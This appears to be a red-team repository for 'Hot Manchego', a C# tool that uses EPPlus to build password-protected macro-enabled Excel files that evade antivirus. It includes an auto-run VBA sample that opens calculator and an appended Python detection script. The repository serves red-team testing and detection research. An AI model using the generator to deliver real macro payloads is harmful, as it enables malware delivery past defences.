├── EPPlus.dll
├── README.md
├── hot-manchego.cs
└── vba.txt

/EPPlus.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RedSiege/hot-manchego/3bd4bf88c111bbe2bde840f8af8e46e61d3c5d72/EPPlus.dll

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Hot Manchego

Macro-Enabled Excel File Generator (.xlsm) using the EPPlus Library.

## Usage

```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt
```

Compile the C# program file along with the EPPlus DLL. Then call the hot-manchego exe file with two arguments: the first is a blank xlsm file and the second is a txt file with your macro in VBA format.

## Introduction

On September 1, 2020, [NVISO published a blog post about Operation Epic Manchego](https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/#comments). A threat actor had been uploading Macro-Enabled Excel Files (xlsm) to VirusTotal with fairly ordinary VBA macros. However, the method they used to create the files helped them get past most A/V vendors. Instead of creating the malicious Excel files with Microsoft Office, like everyone does, they used a third-party library called EPPlus. Documents created with EPPlus differed enough from Office-created ones that most A/V didn't catch a simple LOLBAS payload to get a beacon on a target machine.

For more details about the Epic Manchego campaign and a detailed walkthrough of detection methods, please view [NVISO's post](https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/#comments).

## About This Tool

Hot Manchego uses the EPPlus Library to create a Macro-Enabled Excel File. There are three files (plus the README) in this repository.

1. EPPlus.dll
> This is the brains of the operation. The EPPlus library enables us to create the macro files. If you'd like to compile your own version of the EPPlus DLL provided in this repo, [the original source code repository is available here](https://github.com/JanKallman/EPPlus). We didn't make any modifications to the EPPlus Library for use in this tool.

2. vba.txt
> This is just a sample VBA file that pops calculator.

3. hot-manchego.cs
> The file was based off of Sample15.cs from the EPPlus project. This file drives the creation of the Macro-enabled Excel File. Once compiled, the exe takes two inputs: a blank xlsm file and a txt file with your VBA.

## Detection

NVISO wrote some detection rules for these files. Please see their post.

--------------------------------------------------------------------------------
/hot-manchego.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using OfficeOpenXml;
using System.Security.Cryptography.X509Certificates;
using System.Drawing;
using OfficeOpenXml.Style;
using OfficeOpenXml.Drawing.Chart;

namespace HotManchego
{
    class VBAGenerator
    {
        public static void Main(string[] args)
        {
            // Both arguments are required; print usage and exit otherwise.
            if (args.Length < 2)
            {
                System.Console.WriteLine("Usage: hot-manchego.exe blank.xlsm vba.txt\nThe first argument is a blank XLSM file.\nThe second argument is the VBA you want embedded in the XLSM file.");
                System.Environment.Exit(1);
            }

            // args[0]: path the workbook is saved to; args[1]: text file holding the VBA source.
            // Both are resolved relative to the current directory.
            var outFile = new FileInfo(Path.Combine(Directory.GetCurrentDirectory(), args[0]));
            var vbaFile = new FileInfo(Path.Combine(Directory.GetCurrentDirectory(), args[1]));
            FillVBA(outFile, vbaFile);
        }

        private static void FillVBA(FileInfo outFile, FileInfo vbaFile)
        {
            // Dispose the package once the workbook has been written.
            using (ExcelPackage pck = new ExcelPackage())
            {
                //Add a worksheet.
                var ws = pck.Workbook.Worksheets.Add("Sheet1");
                //ws.Drawings.AddShape("VBASampleRect", eShapeStyle.RoundRect);

                //Create a vba project and set password permissions
                pck.Workbook.CreateVBAProject();
                pck.Workbook.VbaProject.Protection.SetPassword("EPPlus");

                //Read in vba code from file
                pck.Workbook.CodeModule.Code = File.ReadAllText(vbaFile.FullName);

                //Optionally, Sign the code with your company certificate.
                //X509Store store = new X509Store(StoreName.My, StoreLocation.CurrentUser);
                //store.Open(OpenFlags.ReadOnly);
                //pck.Workbook.VbaProject.Signature.Certificate = store.Certificates[0];

                //Save as xlsm
                pck.SaveAs(outFile);
            }
        }
    }
}

--------------------------------------------------------------------------------
/vba.txt:
--------------------------------------------------------------------------------
Private Sub Workbook_Open()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "calc.exe"
    TaskID = Shell(Program, 1)
    If Err <> 0 Then
        MsgBox "Can't start " & Program
    End If
End Sub

--------------------------------------------------------------------------------
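
For the README's Detection section: the Introduction attributes the evasion to how the file is built, so triage can start at the container instead of the macro text. This Python example is added here and is not part of the hot-manchego repository or NVISO's rules; it lists the parts an .xlsm declares as VBA projects (even when renamed) and extracts the per-entry ZIP header values and timestamps to compare against a baseline of workbooks saved by Office. Which values distinguish EPPlus is not stated on this page, `MAX_XML` is an assumed limit, and the sample workbook is constructed.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
VBA_CT = "application/vnd.ms-office.vbaProject"
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # compound-file header expected in a VBA part
MAX_XML = 1 << 20  # assumed cap on [Content_Types].xml, guards against decompression bombs

def vba_parts(zf):
    """Parts typed as a VBA project, whether via an Override or a Default entry."""
    info = zf.getinfo("[Content_Types].xml")
    if info.file_size > MAX_XML:
        raise ValueError("[Content_Types].xml is implausibly large")
    root = ET.fromstring(zf.read(info))
    exts = {d.get("Extension", "").lower() for d in root.iter(CT_NS + "Default")
            if d.get("ContentType") == VBA_CT}
    over = {o.get("PartName", "").lstrip("/").lower(): o.get("ContentType")
            for o in root.iter(CT_NS + "Override")}
    hits = []
    for name in zf.namelist():
        ctype = over.get(name.lower())  # an Override wins over a Default
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ctype == VBA_CT or (ctype is None and ext in exts):
            hits.append(name)
    return sorted(hits)

def triage(data):
    """Macro parts plus the ZIP header values to compare against an Office baseline."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos, ole = zf.infolist(), {}
        for part in vba_parts(zf):
            with zf.open(part) as fh:  # read only the 8-byte magic
                ole[part] = fh.read(8) == OLE_MAGIC
    profile = {(i.create_system, i.extract_version, i.flag_bits, i.compress_type) for i in infos}
    return {"vba_is_ole": ole, "zip_profile": sorted(profile),
            "timestamps": sorted({i.date_time for i in infos})}

def build_sample(part="xl/vbaProject.bin", override=False):
    """Constructed stand-in for a macro-enabled workbook; not output of EPPlus or Excel."""
    decl = ('<Override PartName="/%s" ContentType="%s"/>' % (part, VBA_CT) if override
            else '<Default Extension="bin" ContentType="%s"/>' % VBA_CT)
    ct = '<Types xmlns="%s">%s</Types>' % (CT_NS.strip("{}"), decl)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in (("[Content_Types].xml", ct.encode()),
                           ("xl/workbook.xml", b"<workbook/>"), (part, OLE_MAGIC + b"\0" * 504)):
            zf.writestr(zipfile.ZipInfo(name, date_time=(2020, 9, 1, 12, 0, 0)), body)
    return buf.getvalue()
```

Run `triage()` over a set of workbooks known to come from Office first; a sample whose `zip_profile` or `timestamps` fall outside that baseline while `vba_is_ole` is non-empty is worth a closer look.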